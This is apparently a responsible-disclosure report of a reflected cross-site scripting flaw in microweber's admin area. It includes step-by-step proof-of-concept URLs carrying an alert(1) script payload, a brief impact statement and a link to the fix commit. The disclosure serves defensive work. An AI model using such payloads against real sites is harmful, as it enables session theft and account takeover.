Cross-site Scripting (XSS) - Reflected in microweber/microweber
Valid
Reported on
Feb 20th 2022
Description
There is a Reflected cross site scripting issue chained using these endpoints:
[1] /admin/content/0/edit [2] /apiqq</script><script>alert(1)</script>fca4/page
Proof of Concept
- Login to https://demo.microweber.org
- Now visit https://demo.microweber.org/demo/admin/content/0/edit
- Now open this url (in same tab or new): https://demo.microweber.org/demo/apiqq%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3Efca4/page
The xss payload will be executed in the browser.
Impact
Cross site scripting attacks can lead to cookies stealing (can be chained to account takeover), redirecting users to attackers controlled malicious websites etc
We are processing your report and will contact the
microweber
team within 24 hours.
a year ago
Damanpreet modified the report
a year ago
Damanpreet modified the report
a year ago
We have contacted a member of the
microweber
team and are waiting to hear back
a year ago
Bozhidar Slaveykov Bozhidar
commented
a year ago
https://github.com/microweber/microweber/commit/0b6b1eb5ba85ffc8f74e6f5f5be9dc9f9f7e9d8f
to join this conversation